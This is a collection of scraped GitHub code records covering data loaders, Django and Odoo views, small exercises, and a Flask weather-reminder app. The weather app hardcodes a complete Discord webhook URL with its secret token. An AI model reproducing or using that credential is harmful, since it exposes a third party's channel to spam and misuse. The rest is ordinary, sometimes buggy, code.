tfr_channel_keys + [tfr_label_key]\n example = tf.io.parse_example(\n serialized,\n {key: tf.io.FixedLenFeature([], tf.string) for key in all_keys})\n\n def _build_image_from_channels(*channels_data):\n img = []\n for idx, data in enumerate(channels_data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n channel = f.read(1)\n if idx in channel_rewrite_map:\n v_from, v_to = channel_rewrite_map[idx]\n channel[channel == v_from] = v_to\n img.append(channel)\n img = np.stack(img, axis=-1)\n return img\n\n img = tf.numpy_function(\n func=_build_image_from_channels,\n inp=[example[key] for key in tfr_channel_keys], # type: ignore\n Tout=tf.float32)\n\n def _read_label(data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n label = f.read(1)\n return np.expand_dims(label, axis=-1)\n\n label = tf.numpy_function(func=_read_label,\n inp=[example[tfr_label_key]],\n Tout=tf.uint8)\n\n return img, label\n\n ds = tf.data.TFRecordDataset.list_files(str(file_pattern), shuffle=shuffle)\n ds = ds.interleave(tf.data.TFRecordDataset,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n if repeat:\n ds = ds.repeat()\n if shuffle:\n ds = ds.shuffle(buffer_size=shuffle_buffer_size)\n ds = ds.map(_parse_example,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n if transforms:\n ds = augment_image_dataset(ds,\n transforms=transforms,\n augment_labels=True)\n\n options = 
tf.data.Options()\n options.experimental_distribute.auto_shard_policy = \\\n tf.data.experimental.AutoShardPolicy.DATA\n ds = ds.with_options(options)\n ds = ds.batch(batch_size=batch_size,\n drop_remainder=True,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n ds = ds.prefetch(prefetch_buffer_size)\n return ds\n","repo_name":"stefanistrate/drivendata-stac-overflow","sub_path":"stac_overflow/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
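The pattern used in the record above, wrapping rasterio/numpy work in tf.numpy_function inside a Dataset pipeline, generalises; a minimal sketch (note that the static shape is lost and Tout must be declared by hand):

import numpy as np
import tensorflow as tf

def _np_double(x):
    # arbitrary numpy-side work that TensorFlow cannot trace
    return (x * 2).astype(np.float32)

ds = tf.data.Dataset.range(4)
ds = ds.map(lambda x: tf.numpy_function(func=_np_double,
                                        inp=[tf.cast(x, tf.float32)],
                                        Tout=tf.float32))
for v in ds:
    print(v.numpy())  # 0.0, 2.0, 4.0, 6.0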
+{"seq_id":"31320706422","text":"from odoo import http\nfrom odoo.addons.website_sale.controllers.main import WebsiteSale\nfrom odoo.http import request\n\n\nclass WebsiteSaleFrogblue(WebsiteSale):\n\n @http.route(['/shop/print'], type='http', auth=\"public\", website=True, sitemap=False)\n def print_saleorder(self, **kwargs):\n res = super(WebsiteSaleFrogblue, self).print_saleorder()\n sale_order_id = request.session.get('sale_last_order_id')\n if sale_order_id:\n pdf, _ = request.env.ref('frogblue_reports.report_frogblue_sale_order').sudo().render_qweb_pdf([sale_order_id])\n pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', u'%s' % len(pdf))]\n return request.make_response(pdf, headers=pdfhttpheaders)\n else:\n return res\n","repo_name":"liaohanzhen/custom_14","sub_path":"frogblue/frogblue_reports/controllers/website_sale/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30138300607","text":"\"\"\"\r\n\n\nCreate a function that, given a **string** with at least **three characters**\n, returns an array of its:\n\n 1. Length.\n 2. First character.\n 3. Last character.\n 4. Middle character, if the string has an odd number of characters. Middle TWO characters, if the string has an even number of characters.\n 5. Index of the second occurrence of the second character in the format **\"@ index #\"** and **\"not found\"** if the second character doesn't occur again.\n\n### Examples\n\n all_about_strings(\"LASA\") ➞ [4, \"L\", \"A\", \"AS\", \"@ index 3\"]\n \n all_about_strings(\"Computer\") ➞ [8, \"C\", \"r\", \"pu\", \"not found\"]\n \n all_about_strings(\"Science\") ➞ [7, \"S\", \"e\", \"e\", \"@ index 5\"]\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef all_about_strings(txt):\n newlist = []\n newlist.append(len(txt))\n newlist.append(txt[0])\n newlist.append(txt[-1])\n if len(txt) % 2 != 0:\n middle = len(txt) // 2\n newlist.append(txt[middle])\n else:\n middle = len(txt) // 2\n to_add = txt[middle-1] + txt[middle]\n newlist.append(to_add)\n temp = txt[1]\n if txt.count(temp) == 1:\n newlist.append('not found')\n return newlist\n else:\n txt = txt[0:1] + '$' + txt[2:]\n first_index = txt.index(temp)\n newlist.append('@ index {}'.format(first_index))\n return newlist\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"pEozhEet5c8aFJdso_24.py","file_name":"pEozhEet5c8aFJdso_24.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8776967750","text":"from flask import flask, render_template \nfrom datetime import date\n\n\napp = flask(__name__)\n\n@app.route('/')\ndef show_nasa_pic():\n\ttoday = str(date.today())\n\tresponce = request.get('')\n\tdata= respond\t\n\n\n\nif __name__ =='__main__':\n\tapp.run(debug = True, host='127.0.0.1')\n","repo_name":"clayheart/teamedge-flask-projects","sub_path":"hello_flash/templates/APP.PY","file_name":"APP.PY","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70530520412","text":"############\n## INIT ##\n############\n\nfrom __future__ import print_function\nimport sys, tabix, time, re\n\nprog_name = sys.argv[0].split('/')[-1]\nif len(sys.argv) == 3:\n in_vcf = sys.argv[1]\n in_db = sys.argv[2] # bed.gz\n print(\"[%s] %s run initiated.\" % (time.ctime(), prog_name), file=sys.stderr)\nelse:\n sys.exit(\"\\nUsage: python %s \\n\" % prog_name)\n# fi\n\n\n## Module\ndef has_indel(ref, alts):\n flag_has_indel = False\n ref_len = len(ref)\n\n for alt in alts:\n if ref_len == len(alt) == 1:\n continue\n else:\n flag_has_indel = True\n # fi\n # for end \n return flag_has_indel\n# fed\n\n# Init tabix\ndb = tabix.open(in_db)\n\n# Proc VCF\nfor line in open(in_vcf, \"r\"):\n if line.startswith('#'):\n print(line.strip())\n continue\n field = line.strip().split('\\t')\n chrom = field[0]\n chrom_id = chrom.replace(\"chr\", '')\n chrom_id = 'M' if chrom_id == \"MT\" else chrom_id\n one_pos = int(field[1])\n chr_pos = \"%s:%s\" % (chrom_id, one_pos)\n ref = field[3]\n alts = field[4].split(',')\n query_db = \"chr%s:%s-%s\" % (chrom_id, one_pos, one_pos)\n flag_has_indel = has_indel(ref, alts)\n if not flag_has_indel: # if var has no indel\n print(line.strip())\n continue\n\n try:\n results = db.querys(query_db) # send query\n iter_cnt = sum(1 for _ in results)\n except tabix.TabixError:\n print(line.strip())\n continue\n\n # If at least 1 STR present\n if iter_cnt > 0:\n continue\n elif iter_cnt == 0:\n print(line.strip())\n continue\n else:\n sys.exit(\"ERROR: iter_cnt = %s\" % iter_cnt)\n# for line end\n","repo_name":"soymintc/rainbow","sub_path":"scripts/dbflt_str.py","file_name":"dbflt_str.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"36758840014","text":"import sklearn as sk\nfrom sklearn import datasets as ds\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ntrainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TrainingDataset\"\ntestPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TestingDataset\"\n\ngradeTrain = ds.load_files(trainPath,load_content = True,encoding = 'utf-8')\ngradeTest = ds.load_files(testPath,load_content= True,encoding = 'utf-8')\ngrade3CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade3-Certain.txt\"\ngrade4CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade4-Certain.txt\"\ngrade3CertainList = []\ngrade4CertainList = []\n\n#['Grade 1 or 2', 'Grade 3', 'Grade 4', 'Non-Existent'] - target_names\n# CountVectorizer- Turn text in matrix of token counts\n# Tfidf - Calculate term frequency times inverse document frequency\n\n\n'''Create and train a classifier'''\ndef trainClf():\n global clf\n # Pipeline to quickly train classifier\n clf = Pipeline([('vect',CountVectorizer()),\n ('tfidf',TfidfTransformer()),\n ('clf',MultinomialNB())])\n\n clf = clf.fit(gradeTrain['data'],gradeTrain['target'])\n\n\n'''Predict on Test Data set'''\ndef predictTest():\n predicted = clf.predict(gradeTest['data'])\n certain = checkCertain(gradeTest['data'])\n for change in certain:\n predicted[change[0]] = change[1]\n print(\"TOTAL ACCURACY: \" + str(accuracy_score(gradeTest['target'],predicted)))\n for x in range(len(predicted)):\n index = gradeTest['target'][x]\n pIndex = predicted[x]\n print(gradeTest['data'][x] + \"| ACTUAL:\" +\n gradeTest['target_names'][index] + \" PREDICTED: \"\n + gradeTest['target_names'][pIndex])\n\n'''Loads/Maps the text files containing the words which determines the grade'''\ndef loadCertain(path,list):\n rObject = open(path, 'r')\n for line in rObject:\n line = line.strip()\n line = line.lower()\n list.append(line)\n\n'''Checks if the data passed in contains terms that are specific to a certain grade'''\ndef checkCertain(data):\n certain = []\n #certain indicator - (index,grade)\n for x in range(len(data)):\n temp = ()\n for indicator in grade3CertainList:\n if indicator in data[x]:\n temp = (x,1)\n for i in grade4CertainList:\n if i in data[x]:\n print(i)\n temp = (x,2)\n if temp:\n certain.append(temp)\n return certain\n\nloadCertain(grade3CertainPath,grade3CertainList)\nloadCertain(grade4CertainPath,grade4CertainList)\n\ntrainClf()\npredictTest()","repo_name":"Unagifan/GITGrader","sub_path":"GITGradeClassifier.py","file_name":"GITGradeClassifier.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23460529031","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework import generics, filters, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework import permissions\nfrom rest_framework.decorators import api_view\nfrom rest_framework.generics import (\n CreateAPIView,\n RetrieveUpdateDestroyAPIView, ListAPIView,\n)\n\nfrom user.models import User\nfrom user.serializers import (\n UserSerializer,\n UserLoginSerializer,\n UserLogoutSerializer,\n UserProfileSerializer,\n FollowingSerializer,\n)\n\n\n@api_view([\"GET\"])\ndef user_endpoints(request):\n base_url = request.build_absolute_uri(\"/api/user/\")\n endpoints = {\n \"Create user\": f\"{base_url}register/\",\n \"Login\": f\"{base_url}login/\",\n \"Logout\": f\"{base_url}logout/\",\n \"Token\": f\"{base_url}token/\",\n \"Refresh Token\": f\"{base_url}token/refresh/\",\n \"Verify Token\": f\"{base_url}token/verify/\",\n \"My profile\": f\"{base_url}me/\",\n \"Search Users\": f\"{base_url}users/search/\",\n \"Update/Delete User Profiles\": f\"{base_url}profiles//\",\n \"Following Users\": f\"{base_url}following/\",\n \"User's Followers\": f\"{base_url}/followers/\",\n \"My profiles\": f\"{base_url}profile/\",\n \"User Profiles\": f\"{base_url}all/\",\n \"User's Profile\": f\"{base_url}/\",\n }\n return Response(endpoints)\n\n\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n return obj.user == request.user\n\n\nclass CreateUserView(CreateAPIView):\n serializer_class = UserSerializer\n\n\nclass UserLoginView(APIView):\n serializer_class = UserLoginSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n email = serializer.validated_data[\"email\"]\n password = serializer.validated_data[\"password\"]\n user = authenticate(request, email=email, password=password)\n if user is not None:\n return Response(\n {\"message\": \"Login successful.\"}, status=status.HTTP_200_OK\n )\n else:\n return Response(\n {\"message\": \"Invalid email or password.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserLogoutView(APIView):\n serializer_class = UserLogoutSerializer\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n refresh_token = request.data.get(\n \"refresh\",\n )\n # Blacklist the refresh token to invalidate it\n try:\n token = RefreshToken(refresh_token)\n token.blacklist()\n return Response({\"detail\": \"Logout successful\"})\n except Exception:\n return Response({\"detail\": \"Invalid token\"}, status=401)\n\n\nclass ManageUserView(generics.RetrieveUpdateAPIView):\n serializer_class = UserSerializer\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n\nclass UserProfileUpdateDeleteView(RetrieveUpdateDestroyAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n\n queryset = User.objects.all()\n serializer_class = UserProfileSerializer\n lookup_field = \"pk\"\n\n def get(self, request, *args, 
**kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def put(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserDetailView(generics.RetrieveAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserProfileSerializer\n\n def get(self, request, pk):\n user = User.objects.get(pk=pk)\n serializer = self.serializer_class(user, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def get_followers(self, request, pk):\n user = User.objects.get(pk=pk)\n followers = user.followers.all()\n serializer = self.serializer_class(followers, many=True, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def post(self, request, pk):\n user = User.objects.get(pk=pk)\n request_user = request.user\n if request_user.is_authenticated:\n if user.followers.filter(pk=request_user.pk).exists():\n user.followers.remove(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": False,\n },\n status=status.HTTP_200_OK,\n )\n else:\n user.followers.add(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": True,\n },\n status=status.HTTP_200_OK,\n )\n return Response(\n {\"detail\": \"Authentication required\"}, status=status.HTTP_401_UNAUTHORIZED\n )\n\n\nclass UserProfileListAPIView(APIView):\n def get(self, request):\n profiles = User.objects.all()\n serializer = UserSerializer(profiles, many=True)\n return Response(serializer.data)\n\n\nclass UserSearchView(generics.ListAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserSerializer\n queryset = User.objects.all()\n filter_backends = [filters.SearchFilter]\n search_fields = [\"username\", \"email\"]\n\n\nclass FollowingUserListAPIView(ListAPIView):\n serializer_class = FollowingSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.following.all()\n\nclass FollowerListView(ListAPIView):\n serializer_class = UserSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.followers.all()\n","repo_name":"avkpol/social-media-API","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1613602569","text":"#!/usr/bin/python3\nimport sys\n#print(sys.argv)\nin1 = input('Etner 1-st interface in the bundle: ')\nin2 = input('Enter 2-nd interface in the bundle: ')\nae = input('Enter ae number')\ninterface_template = [ 'set interface {int1} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface {int2} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface ae{ae} agragated-ether-options lacp periodic fast']\n#print(in1, in2, ae)\t \nprint('\\n'.join(interface_template).format(int1=in1, int2=in2, ae=ae))\n","repo_name":"arturiuslim/arthur_storage","sub_path":"arthurs_scripts/jum_ae_int.py","file_name":"jum_ae_int.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25199218689","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/5/5 上午10:19\n# @Author : Chenzd\n# @Site : 读取配置文件\n# @File : readConfig.py\n# @Software: PyCharm\n# @company: LEELEN\nimport configparser\nimport os\nimport filePath\nfrom public.configLog import Logger\nlogger = Logger(logger='public.readConfig.ReadConfig').getlog()\n\nconfig_file = os.path.join(filePath.config_path, 'config.ini')\n\nclass ReadConfig:\n\n def __init__(self):\n self.configParser = configparser.ConfigParser()\n self.configParser.read(config_file)\n\n def get_email(self,name):\n value = self.configParser.get('email',name)\n logger.info('读取config.ini文件 email:[%s:%s]'%(name, value))\n return value\n\nif __name__ == '__main__':\n a = ReadConfig().get_email('mail_user')\n print(a)","repo_name":"chales20/ios_luxdomo","sub_path":"public/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30955299518","text":"import shlex\nimport subprocess\n\ndef execute_cmd(args, useBash = False, printOutput=True):\n \"\"\"\n Execute the external command and get its exitcode, stdout are yield.\n \"\"\"\n\n if useBash:\n args = 'bash.exe -c \"' + ' '.join(args) + '\"'\n \n print('running: ' + str(args))\n\n if printOutput:\n popen = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)\n for stdout_line in iter(popen.stdout.readline, ''):\n print(stdout_line, end='')\n\n popen.stdout.close()\n else:\n popen = subprocess.Popen(args)\n\n return_code = popen.wait()\n if return_code:\n raise subprocess.CalledProcessError(return_code, args)\n\n","repo_name":"c-esswein/gemsearch","sub_path":"gemsearch/utils/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38587622983","text":"import numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\n\ndata = np.mat([[1, 200, 105, 3, False],\n [2, 165, 80, 2, False],\n [3, 184.5, 120, 2, False],\n [4, 116, 70.8, 1, False],\n [5, 270, 150, 4, True]])\n\ncoll = []\nfor row in data:\n coll.append(row[0, 1])\n\nstats.probplot(coll, plot=plt)\nplt.show()\n","repo_name":"Inspring6/OpenCV_TensorFlow","sub_path":"ch03/program3-4.py","file_name":"program3-4.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36389812368","text":"import os\nfrom unittest import TestCase\nimport subprocess\n\n\nclass LocustTestCase(TestCase):\n\n def test(self):\n path = os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n 'django/project/db.sqlite3'\n )\n )\n subprocess.call(['cp', os.devnull, path])\n subprocess.Popen(\n ['python tests/django/project/manage.py migrate && '\n 'python tests/django/project/manage.py runserver'],\n shell=True\n )\n popen = subprocess.Popen([\n 'locust', '-f', 'tests/_locust.py', '--clients=2',\n '--no-web', '--host=http://127.0.0.1:8000'\n ])\n pid = popen.pid\n subprocess.call([\n '''\n sleep 20 && kill {pid}\n '''.format(\n pid=pid\n )\n ], shell=True)\n popen.wait()\n subprocess.call([\n '''\n ps aux |grep manage | grep runserver |\n awk {{'print $2'}} | xargs kill\n '''\n ], shell=True)\n self.assertEquals(popen.returncode, 0)\n","repo_name":"sergeyglazyrindev/gherkin-locust","sub_path":"tests/test_adapters.py","file_name":"test_adapters.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41236648900","text":"\"\"\" dl_model_eval.py: \n \n This program is used to separately evaluate the model with the eval dataset.\n \n A CSV containing the eval dataset is iterated through and the model is used to predict the label of each Tweet.\n\"\"\"\n\n__author__ = \"Breydon Verryt-Reid\"\n__date__ = \"28 Sep 22\"\n__version__ = 1.5\n__status__ = \"Complete\"\n__notes__ = \"This program is intended to be run as a standalone program\"\n\n# importing required libraries\n# !pip install transformers\nfrom transformers import pipeline, AutoModelForSequenceClassification\nimport csv\n\ndef dlmodelmain(input):\n \"\"\" This function contains the model which takes in a string or list of strings and performs an analysis of that text\n\n ** Parameters **\n input: a str containing the body of a Tweet (after being preprocessed)\n\n ** Returns **\n N/A\n \"\"\"\n model = AutoModelForSequenceClassification.from_pretrained(\"bvrau/covid-twitter-bert-v2-struth\", num_labels=2) # this is the model that was trained\n pipe = pipeline(\"text-classification\", model=model, tokenizer=\"bvrau/covid-twitter-bert-v2-struth\", top_k=2, function_to_apply=\"sigmoid\") # this is the pipeline that is used to make predictions\n result = pipe(input) # this is the prediction\n print(result,\"\\n\") # prints the prediction result\n \n # this section of code is used to return the predicted label and score - not in use\n # resultdict = result[0]\n # label = resultdict['label']\n # score = resultdict['score']\n # print(\"** Results **\")\n # print(\"Determination: \"+label)\n # print(\"Certainty: \"+str(score)) \n # return label, score\n\ndef dataloader(file):\n \"\"\" This function loads the data from the csv file and lists item by item the expected output.\n The data is then passed to the dlmodelmain function for pipeline prediction.\n The results are then compared to the expected output and the accuracy is calculated.\n\n ** Parameters **\n N/A\n\n ** Returns **\n N/A\n \"\"\" \n test = file\n with open(test, 'r') as csvfile: # opens the csv file\n datareader = csv.reader(csvfile, delimiter=',') # reads the csv file\n next(datareader) # skips the first row of the csv file (headers)\n for row in datareader: # iterates through each row of the csv file\n if row[0] == \"0\": \n actual = \"real\" # sets the expected output to real\n elif row[0] == \"1\":\n actual = \"fake\" # sets the expected output to fake\n print(\"This should be classified: \", actual) # prints the expected output\n dlmodelmain(row[1]) # passes the Tweet body to the dlmodelmain function for prediction\n\ndataloader(\"preproc_data_eval.csv\")","repo_name":"Struth-Social-UNSW/ITProject2","sub_path":"Backend/deep-learn-algo/train_test/dl_model_eval.py","file_name":"dl_model_eval.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30792608133","text":"import sys\nimport time\nimport subprocess\nfrom subprocess import PIPE, Popen\nfrom threading import Thread\nfrom queue import Queue, Empty # python 3.x\n\n# Django Thread\ndef start_django():\n subprocess.call(['python', './servers/manage.py', 'runserver', '0.0.0.0:8000'])\n\ndjangoThread = Thread(target=start_django, name=\"Django Thread\")\ndjangoThread.start()\n\n\ntime.sleep(2)\n\ndef start_clients():\n subprocess.call(['python', './clients.py'])\n\nclientsThread = Thread(target=start_clients, name=\"Clients Thread\")\nclientsThread.start()\n\n\ntime.sleep(3)\n\ndef start_simulation():\n subprocess.call(['python', './__main__.py'])\n\nsimulationThread = Thread(target=start_simulation, name=\"Simulation Thread\")\nsimulationThread.start()\n\n\n","repo_name":"imran1161/Access-Control-Framework","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70161342172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('profiles', '0003_auto_20170705_0313'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profiles',\n name='locations',\n field=models.CharField(blank=True, max_length=120, default='My Location Default', null=True),\n ),\n ]\n","repo_name":"csp5096/python3.5-django-ecommerce","sub_path":"src/profiles/migrations/0004_auto_20170705_0316.py","file_name":"0004_auto_20170705_0316.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27905926095","text":"from geopy.geocoders import Nominatim\nfrom flask import *\nimport requests\nimport json\nimport getweather\nimport threading\nimport time\nimport schedule\n\napp = Flask(__name__)\n\n# calling the nominatim tool\ngeoLoc = Nominatim(user_agent=\"GetLoc\")\n \n\nweather_api_url = \"https://opendata.cwa.gov.tw/api/v1/rest/datastore/F-C0032-001\"\n#\"latitude\":\"25.0575931\",\"longitude\":\"121.3625344\"\n@app.route('/get_weather', methods=['GET'])\ndef get_weather():\n data = request.get_json()\n authorization = data.get('Authorization')\n latitude = data.get('latitude')\n longitude = data.get('longitude')\n # location = data.get('locationName')\n locname = geoLoc.reverse(\"25.0575931, 121.3625344\")\n address_parts = locname.address.split(\", \")\n if len(address_parts) >= 4:\n location = address_parts[-3]#縣市\n district = address_parts[-4]#區域\n print(\"縣市:\", location)\n print(\"區域:\", district)\n else:\n print(\"地址訊息不足\")\n print(locname.address)\n if not authorization or not latitude or not longitude:\n return jsonify({'error': '前端缺少參數'})\n\n params = {\n 'Authorization': authorization,\n 'locationName': location,\n 'format': 'JSON', \n }\n try:\n response = requests.get(weather_api_url, params=params)\n response.raise_for_status() \n\n try:\n weather_data = response.json()\n return jsonify(weather_data)\n except json.JSONDecodeError as e:\n return jsonify({'error': 'API無法解析為json'})\n\n except requests.exceptions.RequestException as e:\n return jsonify({'error': 'API請求失敗'})\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\ndef sendmsg(name,content):\n webhook_url=\"https://discordapp.com/api/webhooks/1163495849842704565/I7SJdtkonFMMvuXFs3GQTshXtwCB47N3juFGLNtBf1bLAevRIXukZdH82j31jfhRbCxQ\"\n data={\"content\":\"Hi \"+name+\",\\n\"+content}\n headers = {'Content-Type': 'application/json'}\n requests.post(webhook_url, data=json.dumps(data), headers=headers) \n #time.sleep(28800)\n time.sleep(60)\n\n\n#control=0 =>will not send msg to discord\ncontrol=0\n\ndef schedule_sendmsg(name,content):\n global control\n while control==1:\n #schedule.every().monday.at(\"09:00\").do(sendmsg,name,content[0])#早上發\n #schedule.every().tuesday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().wednesday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().thursday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().friday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().monday.at(\"18:00\").do(sendmsg,name,content[1])#晚上發\n #schedule.every().tuesday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().wednesday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().thursday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().friday.at(\"18:00\").do(sendmsg,name,content[1])\n schedule.every().friday.at(\"19:25\").do(sendmsg,name,content[1])\n schedule.run_pending()\n time.sleep(60)\n\n#set control=1 and open clock to send msg to discord\n@app.route('/api/remind', methods=['GET'])\ndef api_remind():\n global control\n #need to add query string ex: /api/remind?username=123&cityselect=新北市\n city=request.args.get(\"cityselect\")\n username=request.args.get(\"username\")\n data=getweather.get_location_weather(city)\n try:\n control=1\n task_thread = threading.Thread(target=schedule_sendmsg, args=(username, data))\n task_thread.daemon = True\n task_thread.start()\n\n data = {\"message\":\"成功發送\"}\n return jsonify(data)\n except Exception as e:\n return 
jsonify({\"error\":\"發送失敗\"+str(e)})\n\n\n#set control=0 and turn off reminder\n@app.route('/api/turnoff', methods=['GET'])\ndef api_turnoff():\n global control\n try:\n control=0\n print(control)\n data = {\"message\":\"成功關閉\"}\n return jsonify(data)\n except Exception as e:\n return jsonify({\"error\":\"關閉失敗\"+str(e)})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)","repo_name":"jason407891/fifth-team-weather","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29944405407","text":"\ndef min_removals(txt1, txt2):\n x=list(txt1)\n y=list(txt2)\n y.sort()\n d=\"\".join(y)\n e=\"\".join(x)\n z=[]\n for i in range(len(x)):\n if x[i] in y:\n z.append(x[i])\n a=(\"\".join(z))\n b=d.strip(a)\n c=e.strip(a)\n return(len(b)+len(c))\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"KYGpco9NFmJRyMQqj_14.py","file_name":"KYGpco9NFmJRyMQqj_14.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
